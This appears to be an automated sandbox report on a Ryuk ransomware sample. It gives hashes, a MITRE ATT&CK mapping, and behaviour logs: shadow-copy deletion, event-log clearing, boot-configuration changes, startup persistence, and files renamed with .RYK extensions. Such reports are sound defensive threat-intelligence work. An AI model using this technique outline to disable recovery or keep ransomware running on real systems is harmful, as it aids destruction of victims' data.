Malware Analysis Report

2024-08-06 09:27

Sample ID 221020-s4bz3scag9
Target 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6
SHA256 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6
Tags
ryuk discovery evasion ransomware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6

Threat Level: Known bad

The file 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6 was found to be: Known bad.

Malicious Activity Summary

ryuk discovery evasion ransomware

Ryuk

Modifies boot configuration data using bcdedit

Clears Windows event logs

Deletes shadow copies

Disables use of System Restore points

Deletes backup catalog

Disables Task Manager via registry modification

Disables taskbar notifications via registry modification

Drops startup file

Checks computer location settings

Modifies file permissions

Enumerates connected drives

Drops file in Windows directory

Drops file in Program Files directory

Launches sc.exe

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Runs net.exe

Kills process with taskkill

Opens file in notepad (likely ransom note)

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Interacts with shadow copies

Views/modifies file attributes

Creates scheduled task(s)

Modifies registry class

MITRE ATT&CK Matrix V6

Initial Access
TA0001
Execution
TA0002
Scheduled Task
T1053
Command-Line Interface
T1059
Persistence
TA0003
Scheduled Task
T1053
Hidden Files and Directories
T1158
Privilege Escalation
TA0004
Scheduled Task
T1053
Defense Evasion
TA0005
File Permissions Modification
T1222
Hidden Files and Directories
T1158
Indicator Removal on Host
T1070
File Deletion
T1107
Credential Access
TA0006
Discovery
TA0007
Query Registry
T1012
Peripheral Device Discovery
T1120
System Information Discovery
T1082
Lateral Movement
TA0008
Collection
TA0009
Exfiltration
TA0010
Command and Control
TA0011
Impact
TA0040
Inhibit System Recovery
T1490

Analysis: static1

Detonation Overview

Reported

2022-10-20 15:40

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-10-20 15:40

Reported

2022-10-20 15:43

Platform

win7-20220901-en

Max time kernel

137s

Max time network

52s

Command Line

"C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe"

Signatures

Ryuk

ransomware ryuk

Disables Task Manager via registry modification

evasion

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe C:\Windows\system32\attrib.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe C:\Windows\system32\cmd.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-text.xml.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BD19828_.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File created C:\Program Files\7-Zip\hrmlog1 C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\gimap.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\FDFFile_8.ico.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\ACECORE.DLL.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\EXPEDITN\EXPEDITN.INF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107182.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaBrightRegular.ttf.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-explorer.xml.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107490.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Noumea.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net.nl_zh_4.4.0.v20140623020002.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-lib-uihandler_zh_CN.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD00090_.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Google\RyukReadMe.html.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Apia.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-swing-plaf.xml.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Amman.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BL00985_.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107426.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\MANIFEST.MF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\feature.properties.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-ui_ja.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\PDFFile_8.ico C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File created C:\Program Files\7-Zip\RyukReadMe.html C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core.xml.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Bahia_Banderas.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\EST.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-progress_ja.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-sampler_ja.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0090087.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105530.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\access-bridge-64.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SONORA\PREVIEW.GIF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH00526_.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\org.eclipse.rcp_root_4.4.0.v20141007-2301.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-core_zh_CN.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui.zh_CN_5.5.0.165303.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-common_zh_CN.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\favicon.ico.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\3RDPARTY.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.services_1.2.1.v20140808-1251.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-awt.xml.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Boa_Vista.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Nipigon.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\LAYERS\LAYERS.INF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107730.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\feature.xml.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.components.ui.zh_CN_5.5.0.165303.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Ust-Nera.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Jamaica.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Brisbane.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\mng.txt.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Merida.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\msmdsrv.rll.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\br.txt.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
